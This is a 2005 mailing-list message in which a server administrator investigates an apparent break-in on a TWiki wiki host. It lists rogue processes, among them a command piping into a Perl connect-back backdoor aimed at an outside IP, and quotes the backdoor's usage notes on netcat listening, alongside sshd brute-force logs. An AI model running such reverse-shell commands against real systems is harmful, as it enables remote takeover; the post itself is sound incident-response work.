Re: Wiki hacked?
+++ Wookey [05-09-29 17:57 +0100]:
> +++ Wolfgang Denk [05-09-29 17:11 +0200]:
> And the reason there is no debian update for it is that the debian twiki
> package is not installed. Looks like whoever installed twiki put their own
> tarball in instead of the debian package.
> That was a mistake - leaves you exposed to security flaws down the line...
OK - it looks like there isn't a twiki package in testing (which the server
is running), which is no doubt why we have a manual install.
> I'll change over to the debian one ASAP. If anyone knows how to do that
> without losing the current content then do feel free to stick your oar in.
I've put in the twiki package from unstable but kept the machine pinned at
Found a bit more evidence of wrongdoing:
we have these rogue www-data processes:
22605 ./bind 1234
22905 sh -c /usr/bin/rlog -rr1.37|perl /var/tmp/backup.pl 126.96.36.199 995
22908 sh -c echo "uname -a";echo "id";/bin/sh
the last stack is using 99% CPU and has used 4365:59 system time
and /var/tmp/backup.pl is an exploit:
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# 1) Listen port to received shell prompt using NetCat on your toolbox, for
example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl
connect.pl <iptoolbox> <ncportlisten>
# The supplied exploit code is not to be used for malicious purpose, but for
educational purpose only. The Authors and
#1ndonesian Security Team WILL NOT responsible for anything happened by the
couse of using all information on these website.
It's pointing at what looks like malaysian server 188.8.131.52 port 995,
which is pop3s.
I've killed those processes and moved the files.
There are loads of messages like:
Sep 25 14:06:14 onz sshd: Illegal user chloe from 184.108.40.206
from sep 19th to today- looks like brute-force attempt to login?
comes from servers:
220.127.116.11 21:46 to 22:01 on sep 19th
18.104.22.168 12:31 to 13:06 on sep 20th
22.214.171.124 13:Â34 to 13:43 on sep 20th
126.96.36.199 23:14 to 23:16 on sep 21st
188.8.131.52 11:40 to 12:26 on sep 22nd
184.108.40.206 at 18:06 on sep 22nd
220.127.116.11 20:30 to 20:49 on sep 22nd including a lot of messahes like
Sep 22 20:47:12 onz sshd: reverse mapping checking getaddrinfo for
luis.spu.edu.ph failed - POSSIBLE BREAKIN ATTEMPT!
18.104.22.168 14:42 to 15:04 on sep 23rd
22.214.171.124 at 17:10 on sep 23rd
and so on.
The original www-data failed login came from 126.96.36.199:
Sep 19 20:12:46 onz sshd: (pam_unix) authentication failure;
logname= uid=0 euid=0 tty=ssh ruser= rhost=188.8.131.52 us
Sep 19 20:12:48 onz sshd: error: PAM: Authentication failure for
www-data from 184.108.40.206
Sep 19 20:12:59 onz sshd: error: PAM: Authentication failure for
www-data from 220.127.116.11
Sep 19 20:13:04 onz sshd: error: PAM: Have exhasted maximum number of
retries for service. for www-data from 18.104.22.168
OK - that's enough for tonight
Aleph One Ltd, Bottisham, CAMBRIDGE, CB5 9BA, UK Tel +44 (0) 1223 811679
work: http://www.aleph1.co.uk/ play: http://www.chaos.org.uk/~wookey/